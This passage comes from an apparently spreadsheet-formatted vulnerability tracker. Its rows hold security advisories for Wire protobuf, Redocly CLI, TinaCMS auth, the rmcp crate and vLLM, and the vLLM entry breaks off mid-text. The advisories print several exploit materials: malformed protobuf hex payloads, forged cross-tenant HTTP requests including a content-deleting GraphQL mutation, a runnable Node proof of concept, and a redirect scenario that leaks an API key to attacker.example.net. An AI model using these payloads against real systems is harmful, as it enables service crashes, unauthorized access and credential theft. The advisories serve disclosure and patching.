- The application decodes attacker-controlled protobuf bytes with Wire.
- No authentication is required if the decoding endpoint is reachable without authentication.
- A single short malformed protobuf payload is sufficient for the Kotlin byte-array fast path.
Most directly affected Kotlin entry points:
- `ProtoAdapter.decode(ByteArray)`
- `ProtoAdapter.decode(ByteString)`
Adjacent Kotlin path hardened by this fix:
- `ProtoAdapter.decode(BufferedSource)`
- direct use of `ProtoReader`
Affected Swift entry points:
- Swift `ProtoDecoder` and `ProtoReader` APIs when decoding attacker-controlled `Data` or buffers.
### Proof of concept and regression payloads
These payloads are intentionally small and should be treated as malformed protobuf input. After the fix, they must fail with normal decode errors such as `IOException`, `EOFException`, or `ProtoDecoder.Error.unexpectedEndOfData`, not unchecked runtime exceptions, traps, out-of-bounds reads, or large allocations.
#### Kotlin byte-array known length-delimited field
Hex:
```text
0A FF FF FF FF 07
```
Meaning:
- `0A`: field 1, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix behavior observed through `Person.ADAPTER.decode(byteArray)`:
```text
java.lang.IllegalArgumentException: startIndex: 6 &gt; endIndex: -2147483643
```
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin byte-array unknown length-delimited field
Hex:
```text
1A FF FF FF FF 07
```
Meaning:
- `1A`: field 3, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix behavior observed:
```text
ArrayIndexOutOfBoundsException
```
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin byte-array skipped group containing oversized positive length
Hex:
```text
0B 0A FF FF FF FF 07 0C
```
Meaning:
- `0B`: start group, field 1
- `0A`: nested field 1, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
- `0C`: end group, field 1
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin current-message-limit fixed32 boundary
Hex:
```text
02 0D 05 00 00 00
```
Meaning:
- `02`: outer length-delimited message length is 2 bytes
- `0D`: nested field 1, fixed32
- `05 00 00 00`: enough bytes remain in the underlying source, but not inside the current logical message limit
Expected fixed behavior:
```text
EOFException
```
This covers the invariant that scalar reads must not cross the current length-delimited message boundary even when the underlying source has more bytes available.
#### Swift tag-only varint value
Hex:
```text
08
```
Meaning:
- `08`: field 1, varint
- Missing varint value byte
Pre-fix risk:
- `ReadBuffer.readVarint()` could dereference `pointer.pointee` before verifying that a byte remained.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift nested message with oversized positive length
Hex:
```text
12 FF FF FF FF 07
```
Meaning:
- `12`: field 2, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix risk:
- Nested message decoding computed an end pointer from an untrusted length before proving that the buffer contained that many bytes.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift packed repeated field with oversized positive length
Hex:
```text
0A FF FF FF FF 07
```
Meaning:
- `0A`: field 1, length-delimited packed repeated field
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix risk:
- Packed repeated decoding could reserve capacity based on an untrusted length before proving the bytes were present.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift size-delimited stream with unrepresentable size
Hex:
```text
FF FF FF FF FF FF FF FF FF 01
```
Meaning:
- Size-delimited message length varint `UInt64.max`
Pre-fix risk:
- `ProtoDecoder.decodeSizeDelimited(_:from:)` converted the untrusted `UInt64` to `Int` without exactness checking.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
### Root cause
The vulnerable code mixed three operations that must remain separate:
1. Decode an untrusted protobuf length.
2. Validate that the length is non-negative and fits within the current logical message boundary.
3. Advance the cursor, pointer, limit, slice, or allocation based on that length.
In the vulnerable paths, step 3 happened before step 2 was complete. For Kotlin `ByteArrayProtoReader32`, this caused signed integer wraparound in `pos + length`. For Swift, related pointer and allocation operations could be performed before proving the requested bytes existed.
### Fix
The fix centralizes checked cursor and pointer advancement.
Kotlin changes:
- `ByteArrayProtoReader32` now validates constructor invariants for `pos` and `limit`.
- `ByteArrayProtoReader32` now uses shared helpers to:
  - reject negative lengths,
  - compute checked limits,
  - compute remaining bytes in the current logical limit,
  - validate before `skip`,
  - validate before string and bytes reads,
  - validate before fixed32 and fixed64 reads.
- `ProtoReader` now mirrors the same logical-boundary model for:
  - length-delimited limit calculation,
  - skipped length-delimited fields,
  - varint reads,
  - fixed32 reads,
  - fixed64 reads,
  - current-message remaining-byte calculations.
Swift changes:
- `ReadBuffer` now computes checked end pointers only after confirming `count &gt;= 0` and `count &lt;= remaining`.
- `ReadBuffer.readVarint()` verifies one byte remains before each byte dereference.
- `ReadBuffer.readBuffer(count:)`, `readData(count:)`, `readFixed32()`, and `readFixed64()` compute the checked new pointer before reading and advancing.
- `ProtoReader.beginMessage()` validates nested message lengths before storing a message-end pointer.
- Packed repeated decoding validates the packed field length before preallocation and before constructing the loop boundary.
- `ProtoDecoder.decodeSizeDelimited(_:from:)` converts sizes with `Int(exactly:)` and verifies that the full message bytes exist before constructing a child buffer.
Fixed in PR #3635:
- https://github.com/square/wire/pull/3635
- Fix commit `25ebcabb9ab7f12d1d77af75ecbc51726fddc015`
### Workarounds
The recommended remediation is to upgrade to a patched release.
Partial mitigations if an immediate upgrade is not possible:
- Reject or cap untrusted protobuf message sizes before passing bytes to Wire.
- Prefer decoding from a bounded source where possible rather than decoding unbounded attacker-controlled byte arrays.
- Treat unchecked runtime exceptions from protobuf decode as malformed-input failures at service trust boundaries so they cannot crash the process.
- For Swift, do not pass untrusted size-delimited streams or `Data` directly to affected decoders without an outer size cap and exception/error boundary.
These mitigations reduce exposure but do not fully fix the parser bugs.
### Detection
A crash or error may contain one of the following symptoms when processing malformed protobuf bytes:
```text
IllegalArgumentException: startIndex: 6 &gt; endIndex: -2147483643
ArrayIndexOutOfBoundsException
IndexOutOfBoundsException
unexpected unchecked RuntimeException during ProtoAdapter.decode(ByteArray)
Swift trap during Int conversion from an untrusted protobuf size
Swift unexpected pointer/buffer failure while reading malformed varints or length-delimited values
```
The absence of these exact messages does not prove safety. Any unchecked exception, trap, or process crash while decoding malformed length-delimited protobuf input should be investigated.
### Verification
Regression tests added:
- `ProtoReader32Test.lengthDelimitedRejectsPositiveLengthOverflow`
- `ProtoReader32Test.fixed32CannotReadPastLengthDelimitedLimit`
- `ProtoReaderTest.fixed32CannotReadPastLengthDelimitedLimit`
- `ProtoReaderTests.testReadVarintRejectsMissingValue`
- `ProtoReaderTests.testNestedMessageRejectsOversizedLength`
- `ProtoReaderTests.testPackedRepeatedRejectsOversizedLengthBeforePreallocation`
- `ProtoDecoderTests.testDecodeSizeDelimitedRejectsUnrepresentableSize`
Focused verification command:
```bash
./gradlew :wire-runtime:jvmTest :wire-runtime-swift:test
```
Expected result:
```text
BUILD SUCCESSFUL
```
### Relationship to related advisories
This is a distinct vulnerability from the negative-length issues. It is a
different bug class — a positive, non-negative length (for example
`2147483647`) that passes the existing `length &lt; 0` check but still overflows
the signed 32-bit cursor or crosses the current message boundary — and it has
a separate fix (PR #3635, not the negative-length PRs).
- `CVE-2026-45799` / `GHSA-7xpr-hc2w-34m9` fixed the original Kotlin/JVM
  negative-length skipped-group crash (Wire `6.3.0`). The non-negative
  overflow described here was not covered by that check and remained
  exploitable through `6.4.4`.
- `GHSA-86wm-r4c5-2rc9` / `CVE-2026-61695` covers the Swift negative-length
  `skipGroup()` crash (PR #3616). The Swift hardening in this advisory
  (PR #3635) instead addresses positive/oversized-length overflow, buffer
  over-read, and unrepresentable-size conversions in the Swift readers.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63126</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63225</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>npm:@redocly/cli</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>1.34.17, 2.33.2</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr"/>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>### Impact
An OpenAPI or AsyncAPI description could make the `split` command write
files outside the chosen output directory, on the machine of anyone who runs
`split` against it. The write is constrained rather than a free file-write
primitive: component data is emitted only as YAML/JSON, and code-sample files are
named after the HTTP method, so an attacker can place or overwrite files at an
unintended path but has limited control over their name and contents.
### Patches
Fixed in `@redocly/cli` v2.33.2.
### Workarounds
Do not run the `split` command on API descriptions from untrusted or unreviewed sources.
To detect an exploit attempt, inspect the description's component names and
`x-codeSamples` `lang` values for a literal `../` — neither legitimately contains
path segments.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63225</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63506</t>
        </is>
      </c>
      <c r="D21" s="5" t="inlineStr"/>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>npm:@tinacms/auth, npm:next-tinacms-azure</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr">
        <is>
          <t>1.1.4, 15.0.1</t>
        </is>
      </c>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr"/>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>## Summary
`@tinacms/auth`'s `isAuthorized(req)` decides authorization by validating the caller's bearer token against `https://identity.tinajs.io/v2/apps/${req.query.clientID}/currentUser`, where the `clientID` comes from the request and is never compared to the site's own configured TinaCloud app id. The function answers "is this token a verified user of whatever app the caller named?" instead of "is this token a verified user of THIS site?"
Any TinaCloud user can create their own free app, get a valid token for it, and send `?clientID=&lt;their-own-app&gt;` plus `Authorization: &lt;their-own-token&gt;` to a victim self-hosted site. The victim's `authorized` callback runs `const user = await isAuthorized(req); return user &amp;&amp; user.verified`, which returns `true`, and the victim authorizes the attacker.
The attacker holds no account on the victim and needs no victim interaction. With the media handlers this grants read, upload, and delete on the victim's media bucket. When the backend uses `TinaCloudBackendAuthProvider()` (the default the `tinacms init` wizard generates for TinaCloud auth), it grants full GraphQL read, write, and delete of the victim's content.
## Affected code (confirmed at `5a6839f`)
`packages/@tinacms/auth/src/index.ts:71-88` reads the `clientID` from the request:
```ts
export const isAuthorized = async (req: NextApiRequest) =&gt; {
  const clientID = req.query.clientID;     // attacker-controlled
  const token = req.headers.authorization; // attacker-controlled
  if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
    return await isUserAuthorized({ clientID, token });
  }
  return undefined;
};
```
`index.ts:16-43` sends that caller-chosen `clientID` straight to the identity server, and returns the user on `200`:
```ts
const tinaCloudRes = await fetch(
  `https://identity.tinajs.io/v2/apps/${clientID}/currentUser`,
  { headers: new Headers({ 'Content-Type': 'application/json', authorization: token }), method: 'GET' }
);
if (tinaCloudRes.ok) { return await tinaCloudRes.json(); }
```
`index.ts:118-135` (`TinaCloudBackendAuthProvider`) gates only on `verified`, which reflects the attacker's own email verification:
```ts
isAuthorized: async (req, _res) =&gt; {
  const user = await isAuthorized(req as NextApiRequest);
  if (user &amp;&amp; user.verified) return { isAuthorized: true };
  return { isAuthorized: false, errorCode: 401, errorMessage: 'Unauthorized' };
},
```
Every media-store README wires the same gate (`next-tinacms-cloudinary/README.md:113-122`, identical in `s3` and `dos`):
```ts
authorized: async (req, _res) =&gt; {
  if (process.env.NEXT_PUBLIC_USE_LOCAL_CLIENT === '1') return true;
  const user = await isAuthorized(req);
  return user &amp;&amp; user.verified;   // no clientID === &lt;this site's app&gt; check
}
```
The bug is duplicated in `next-tinacms-azure/src/auth.ts:34-51` (`req.nextUrl.searchParams.get('clientID')`). Downstream nothing pins the site's `clientID`: `@tinacms/datalayer/src/backend/index.ts:201` gates on the boolean, and `next-tinacms-cloudinary/src/handlers.ts:36` returns 401 only when the callback is false. The `tinacms init` TinaCloud path ships this by default (`@tinacms/cli/.../prompts/authProvider.ts:17` -&gt; `TinaCloudBackendAuthProvider()`, used in `templates/tinaNextRoute.tsx:21-24` for every non-local deployment).
## Steps to reproduce (real target)
**Setup:** attacker has one free TinaCloud account with one app (`clientID = ATTACKER_APP`, token `T_attacker`) and no victim account. Victim is any self-hosted TinaCMS site using `@tinacms/auth`.
Media bucket (read; the same gate covers `POST` upload and `DELETE`):
```
GET /api/cloudinary/media?clientID=ATTACKER_APP HTTP/1.1
Host: victim.example
Authorization: T_attacker
```
Content backend, when `TinaCloudBackendAuthProvider` is used:
```
POST /api/tina/gql?clientID=ATTACKER_APP HTTP/1.1
Host: victim.example
Authorization: T_attacker
Content-Type: application/json
{"query":"mutation($c:String!,$r:String!){deleteDocument(collection:$c,relativePath:$r){__typename}}","variables":{"c":"post","r":"hello.md"}}
```
**Expected:** 401/403 for a user with no access to `victim.example`.
**Actual:** 200, because authorization is bound to the attacker-supplied `clientID`.
## Proof of concept (self-contained, zero dependencies)
Save the file below as `poc.js` and run `node poc.js` (Node &gt;= 18). It runs the package's own `isAuthorized` / `isUserAuthorized` (TypeScript types removed; the hard-coded `identity.tinajs.io` base read from an env var so it points at a local identity model) behind the verbatim media-store `authorized` callback. The identity model scopes tokens to apps correctly and is not itself vulnerable; the bug is that the victim lets the caller choose which app to validate against.
```js
/**
 * Self-contained PoC — @tinacms/auth cross-tenant authorization bypass
 * Audited commit: 5a6839f95ca60d1b9f4032a3bed1ae4a338a4787 (@tinacms/auth 1.1.3)
 *
 * Zero dependencies. Run with:  node poc.js   (Node &gt;= 18 for global fetch)
 *
 * The two functions below are copied from packages/@tinacms/auth/src/index.ts.
 * The ONLY changes are: TypeScript types removed, and the hard-coded
 * https://identity.tinajs.io base read from IDENTITY_BASE so it can point at the
 * local identity model. req.query.clientID, the currentUser call, and the
 * `user &amp;&amp; user.verified` gate are byte-for-byte the original logic.
 */
const http = require('http');
const IDENTITY_PORT = 18099;
const VICTIM_PORT = 19090;
process.env.IDENTITY_BASE = `http://127.0.0.1:${IDENTITY_PORT}`;
/* ===== verbatim from @tinacms/auth/src/index.ts (types stripped) ===== */
const isUserAuthorized = async (args) =&gt; {
  const clientID = args.clientID;
  const token = args.token;
  try {
    const tinaCloudRes = await fetch(
      `${process.env.IDENTITY_BASE || 'https://identity.tinajs.io'}/v2/apps/${clientID}/currentUser`,
      {
        headers: new Headers({ 'Content-Type': 'application/json', authorization: token }),
        method: 'GET',
      }
    );
    if (tinaCloudRes.ok) {
      const user = await tinaCloudRes.json();
      return user;
    }
    return;
  } catch (e) {
    console.error(e);
    throw e;
  }
};
const isAuthorized = async (req) =&gt; {
  const clientID = req.query.clientID;       // &lt;-- attacker-controlled
  const token = req.headers.authorization;   // &lt;-- attacker-controlled
  if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
    return await isUserAuthorized({ clientID, token });
  }
  return undefined;
};
/* ===== identity model: a token grants access to the app its owner owns =====
   This is NOT the vulnerable part. It scopes tokens to apps correctly. The bug
   is that the victim lets the caller choose which app to validate against.     */
const TOKEN_FOR = {
  'victim-app': 'valid-token-for-victim-app',
  'attacker-app': 'valid-token-for-attacker-app',
};
const USER_FOR = {
  'victim-app': { id: 'u-victim', email: 'owner@victim.example', verified: true, role: 'admin' },
  'attacker-app': { id: 'u-attacker', email: 'attacker@evil.example', verified: true, role: 'admin' },
};
const identity = http.createServer((req, res) =&gt; {
  const m = req.url.match(/^\/v2\/apps\/([^/]+)\/currentUser$/);
  if (!m) { res.writeHead(404); return res.end('nf'); }
  const app = decodeURIComponent(m[1]);
  if (TOKEN_FOR[app] &amp;&amp; req.headers['authorization'] === TOKEN_FOR[app]) {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify(USER_FOR[app]));
  }
  res.writeHead(401, { 'Content-Type': 'application/json' });
  return res.end(JSON.stringify({ message: 'unauthorized for this app' }));
});
/* ===== victim site (own clientID = victim-app), verbatim media-store README callback ===== */
const authorized = async (req) =&gt; {
  const user = await isAuthorized(req);
  return user &amp;&amp; user.verified;             // never checks req.query.clientID === victim-app
};
const victim = http.createServer(async (req, res) =&gt; {
  const u = new URL(req.url, `http://127.0.0.1:${VICTIM_PORT}`);
  req.query = Object.fromEntries(u.searchParams.entries());
  if (!u.pathname.startsWith('/api/cloudinary/media')) { res.writeHead(404); return res.end('nf'); }
  if (!(await authorized(req))) {
    res.writeHead(401, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({ message: 'sorry this user is unauthorized' }));
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  return res.end(JSON.stringify({ authorized: true, site: 'victim-app',
    media: ['victim/private/contract.pdf', 'victim/private/customers.csv'] }));
});
/* ===== driver ===== */
function call(clientID, token) {
  return new Promise((resolve) =&gt; {
    const r = http.request({ host: '127.0.0.1', port: VICTIM_PORT,
      path: `/api/cloudinary/media?clientID=${encodeURIComponent(clientID)}`,
      method: 'GET', headers: { authorization: token } }, (res) =&gt; {
      let b = ''; res.on('data', (c) =&gt; (b += c));
      res.on('end', () =&gt; resolve({ status: res.statusCode, body: b }));
    });
    r.on('error', (e) =&gt; resolve({ status: 0, body: String(e) })); r.end();
  });
}
(async () =&gt; {
  await new Promise((r) =&gt; identity.listen(IDENTITY_PORT, '127.0.0.1', r));
  await new Promise((r) =&gt; victim.listen(VICTIM_PORT, '127.0.0.1', r));
  const c1 = await call('victim-app', 'valid-token-for-victim-app');
  console.log('[CONTROL 1  legit victim user      ] clientID=victim-app   token=victim   -&gt;', c1.status, c1.body);
  const c2 = await call('victim-app', 'valid-token-for-attacker-app');
  console.log('[CONTROL 2  attacker token, victim ] clientID=victim-app   token=attacker -&gt;', c2.status, c2.body);
  const atk = await call('attacker-app', 'valid-token-for-attacker-app');
  console.log('[ATTACK     attacker own app+token ] clientID=attacker-app token=attacker -&gt;', atk.status, atk.body);
  const bug = c1.status === 200 &amp;&amp; c2.status === 401 &amp;&amp; atk.status === 200;
  console.log('\nVERDICT:', bug
    ? 'VULNERABLE — attacker authorized on victim site with credentials only for their own app.'
    : 'NOT REPRODUCED');
  identity.close(); victim.close();
  process.exit(bug ? 0 : 1);
})();
```
Output:
```
[CONTROL 1  legit victim user      ] clientID=victim-app   token=victim   -&gt; 200 {"authorized":true,"site":"victim-app","media":[...]}
[CONTROL 2  attacker token, victim ] clientID=victim-app   token=attacker -&gt; 401 {"message":"sorry this user is unauthorized"}
[ATTACK     attacker own app+token ] clientID=attacker-app token=attacker -&gt; 200 {"authorized":true,"site":"victim-app","media":[...]}
VERDICT: VULNERABLE - attacker authorized on victim site with credentials only for their own app.
```
CONTROL 1 (200) shows the identity model is faithful, not a blanket allow. CONTROL 2 (401) shows the attacker cannot reach the victim's app with their own token. ATTACK (200) shows that naming their own app id, which their own token matches, passes the victim's gate and returns the victim's private media.
I verified the full chain in source at the audited commit and reproduced the code logic deterministically with the PoC above. I did not run the end-to-end attack against production `identity.tinajs.io` with two real accounts and a live deployment; that step needs two real accounts and a deployment. The one assumption it rests on, that `GET /v2/apps/&lt;attacker-app&gt;/currentUser` with the attacker's own token returns `200` + `verified:true`, is the normal behavior of an app owner's own session.
## Impact
An attacker with a free TinaCloud account reaches editor-level control of unrelated tenants:
- **Media handlers:** list and read media, upload arbitrary objects (`next-tinacms-dos` writes `ACL: public-read`, usable to host malware or phishing under the victim's CDN), and delete media by key.
- **`TinaCloudBackendAuthProvider` backend:** arbitrary GraphQL. Read every document, `createDocument` / `updateDocument` to deface or inject content that deploys to production, and `deleteDocument` to destroy content.
The attacker scripts requests with their own token and `clientID=&lt;own app&gt;` against known TinaCMS self-hosted endpoints, so it scales across deployments.
## Fix
Bind the decision to the site's own configured app id instead of the request value.
```diff
- export const isAuthorized = async (req: NextApiRequest) =&gt; {
-   const clientID = req.query.clientID;
-   const token = req.headers.authorization;
+ export const isAuthorized = async (req: NextApiRequest, expectedClientID?: string) =&gt; {
+   const requestClientID = req.query.clientID;
+   const token = req.headers.authorization;
+   const clientID = expectedClientID ?? process.env.NEXT_PUBLIC_TINA_CLIENT_ID;
+   if (expectedClientID &amp;&amp; requestClientID &amp;&amp; requestClientID !== expectedClientID) {
+     return undefined; // refuse a cross-tenant clientID
+   }
    if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
      return await isUserAuthorized({ clientID, token });
    }
    return undefined;
  };
```
Thread the site's configured `clientID` into `TinaCloudBackendAuthProvider()` and the media handler config, require `isUserAuthorized` to use it rather than `req.query.clientID`, apply the same change to `next-tinacms-azure/src/auth.ts`, and update the media-store READMEs so integrators stop reintroducing the request-driven `clientID`.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63506</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64684</t>
        </is>
      </c>
      <c r="D22" s="5" t="inlineStr"/>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="inlineStr"/>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>2.1.0</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr"/>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>## Summary
The `rmcp` crate's `StreamableHttpClientTransport` forwards caller-supplied custom HTTP headers (such as `X-API-Key`, `X-Auth-Token`, `Api-Key`) to cross-origin redirect targets. The `default_http_client()` function builds a `reqwest::Client` without a redirect policy override, so the default `limited(10)` policy follows `307`/`308` redirects and forwards all per-request headers except `Authorization`, `Cookie`, and `Proxy-Authorization`. Custom auth headers injected via `StreamableHttpClientTransportConfig.custom_headers` are not classified as sensitive and are therefore forwarded verbatim to any redirect target — including an attacker-controlled server.
## Affected versions
- Repository: `github.com/modelcontextprotocol/rust-sdk`
- Crate: `rmcp`
- Commit tested: `c330fede90e4729c234f8e87fdbc5ea27a1dd10c` (HEAD, 2026-05-21)
## Vulnerability
**File:** `crates/rmcp/src/transport/common/reqwest/streamable_http_client.rs`
**Root cause 1 — no redirect policy override:**
```rust
// Lines 302-307
fn default_http_client() -&gt; reqwest::Client {
    reqwest::Client::builder()
        .pool_max_idle_per_host(0)
        .build()
        .expect("failed to build default reqwest client")
}
```
No `.redirect(reqwest::redirect::Policy::none())` call. The default `limited(10)` policy follows up to 10 redirects and, on cross-origin redirects, strips only `Authorization`, `Cookie`, and `Proxy-Authorization`.
**Root cause 2 — custom headers not sensitivity-marked:**
```rust
// Lines 26-35
fn apply_custom_headers(
    mut builder: reqwest::RequestBuilder,
    custom_headers: HashMap&lt;HeaderName, HeaderValue&gt;,
) -&gt; Result&lt;reqwest::RequestBuilder, StreamableHttpError&lt;reqwest::Error&gt;&gt; {
    for (name, value) in custom_headers {
        validate_custom_header(&amp;name).map_err(StreamableHttpError::ReservedHeaderConflict)?;
        builder = builder.header(name, value);  // no sensitivity marker
    }
    Ok(builder)
}
```
Headers added via `RequestBuilder::header()` are forwarded to redirect targets because reqwest only strips headers from its own sensitive-header list (`Authorization`, `Cookie`, `Proxy-Authorization`).
**Exposed API:** `StreamableHttpClientTransportConfig.custom_headers` (line 1070), intended for custom auth headers:
```rust
/// Custom HTTP headers to include with every request
pub custom_headers: HashMap&lt;HeaderName, HeaderValue&gt;,
```
## Attack scenario
1. A caller sets `custom_headers` with an API key for the MCP server:
   ```rust
   let config = StreamableHttpClientTransportConfig::with_uri("https://mcp.example.com/mcp")
       .custom_headers([(HeaderName::from_static("x-api-key"),
                         HeaderValue::from_static("my-secret-key"))].into());
   ```
2. An attacker compromises `mcp.example.com` to return `307 Temporary Redirect` to `https://attacker.example.net/capture`.
3. `rmcp` follows the redirect, forwarding `X-API-Key: my-secret-key` to `attacker.example.net`.
4. The attacker captures the secret and reuses it to call the MCP server directly.
## Negative control
The `auth_header` path (`StreamableHttpClientTransportConfig::auth_header()`) sets the value via `builder.bearer_auth(auth_header)`, which maps to the `Authorization` header — stripped by reqwest on cross-origin redirects. That path is not affected. Only `custom_headers` is vulnerable.
## Fix
In `default_http_client()`, disable automatic redirect following:
```rust
fn default_http_client() -&gt; reqwest::Client {
    reqwest::Client::builder()
        .pool_max_idle_per_host(0)
        .redirect(reqwest::redirect::Policy::none())  // &lt;-- add this
        .build()
        .expect("failed to build default reqwest client")
}
```
The transport can then inspect `3xx` responses and decide whether to follow, stripping sensitive headers before doing so. Alternatively, use `reqwest::ClientBuilder::connection_verbose` or per-request `Request::headers_mut()` to remove auth headers before the redirect is followed.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64684</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69147</t>
        </is>
      </c>
      <c r="D23" s="5" t="inlineStr"/>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>pip:vllm</t>
        </is>
      </c>
      <c r="M23" s="5" t="inlineStr">
        <is>
          <t>0.28.0</t>
        </is>
      </c>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr"/>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>## Summary
Current vLLM `main` lets an inference request choose the PyNvVideoCodec GPU video decoder through `media_io_kwargs.video.video_backend`, but engine GPU memory reservation is computed only from static startup configuration and `VLLM_VIDEO_LOADER_BACKEND`. If the server starts with the default OpenCV/software backend and no `--mm-ipc-gpu-memory-gb` budget, a client can still route a video request into the PyNvVideoCodec path after startup, causing frontend CUDA-context, decoder-surface, and decoded-frame GPU allocations that were not carved out of the engine KV-cache budget.
## Technical Details
The vulnerable boundary is the split between request-time media decoding choices in the API server and startup-time memory budgeting in the engine worker. Request bodies for Chat Completions and Responses expose `media_io_kwargs`, and those values are forwarded to the shared media connector. For video inputs, `MediaConnector.fetch_video()` copies `self.media_io_kwargs["video"]` into `video_io_kwargs`, only setting a model-derived backend when `video_backend` is absent. `VideoMediaIO.__init__()` then consumes `video_backend` from those kwargs and loads that backend from `VIDEO_LOADER_REGISTRY`.
The relevant request-side source path is:
```python
